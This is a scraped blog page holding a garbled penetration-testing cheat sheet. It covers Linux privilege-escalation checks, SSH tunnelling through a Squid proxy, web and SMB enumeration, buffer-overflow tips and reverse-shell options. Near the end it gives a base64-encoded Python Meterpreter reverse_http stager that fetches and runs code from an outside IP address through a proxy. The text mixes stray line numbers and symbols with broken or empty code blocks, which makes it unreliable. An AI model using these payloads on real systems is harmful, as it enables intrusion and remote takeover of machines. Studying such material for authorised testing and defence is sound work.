![]() bash_history, nf.) - Known binaries with suid flag and interactive (nmap) - Custom binaries with suid flag either using other binaries or with command execution - Writable files owned by root that get executed (cronjobs) - MySQL as root - Vulnerable services (chkrootkit, logrotate) - Writable /etc/passwd - Readable. ssh/ -N -f ``` 16 17 # SSH over HTTP (Squid)ġ8 19 **socat** 20 21 socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128Ģ2 23ssh -p 9999 24 25 **proxytunnel** 26 27 proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555Ģ8 29ssh -p 5555 30 31 **proxychains** 32 33 http 192.168.1.41 3128ģ4 35proxychains ssh 36 37!( ) **corkscrew** 38 39 ssh -t /bin/sh 40 41!( )Ĥ8 49 - dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old - banner inspection - review source code - bruteforce with cewl-based dictionary - searchsploit look at versions properly - test all the paths with the exploits, mangle it - nmap -script vuln - nmap -script safe (ssl-cert, virtual hosts) - always incercept with Burp - nikto -h - LFI, RFI, SQL, RCE, XXE, SSRF injections - PUT method all directories - Change POST body encoding with Burp - Bruteforce parameter names - dirsearch with cookie once authenticated - download vulnerable application from exploit-db and examine itĥ2 53 - shellshock - bruteforce - user_enum - Debian OpenSSL Predictable PRNGĥ6 57 - nmap -script vuln - nmap -script smb* - nmap -script smb-enum-shares,smb-ls - enum4linuxĦ0 61 - change shellcode - make sure all badchars are removed - read the exploit properly in case this makes changes in the shellcode - capture traffic with wireshark making sure the entire shellcode is transmited - run the exploit several times - make sure the JMP ESP matches OS and languageĦ8 69test: `````` simple shell: `````` `````` file upload: ```') ?>``` file upload evasion: rot13 + urlencode ``````ħ2 73 - All pentest monkey reverse shells: - msfvenom x86/linux/shell_reverse_tcp -f elf - Metasploit `web_delivery` module - which wget | nc 74 75 # SQLi UNIONħ6 77search for response on HTML source codeħ8 79 # Reverse HTTP Shell through ProxyĨ0 81```use payload/python/meterpreter/reverse_http``` !( ) ```python -c "import base64,sys exec(base64.b64decode(]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))"``` Finally we set up the handler: !( )Ĩ8 89 - sudo -l - Kernel Exploits - OS Exploits - Password reuse (mysql. ![]() ![]() Raw file 1 # Usefuls scripts and commandsĨ > sudo tightvncserver -geometry 1024x768ġ4 ssh -L 5901:localhost:5901 -i.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |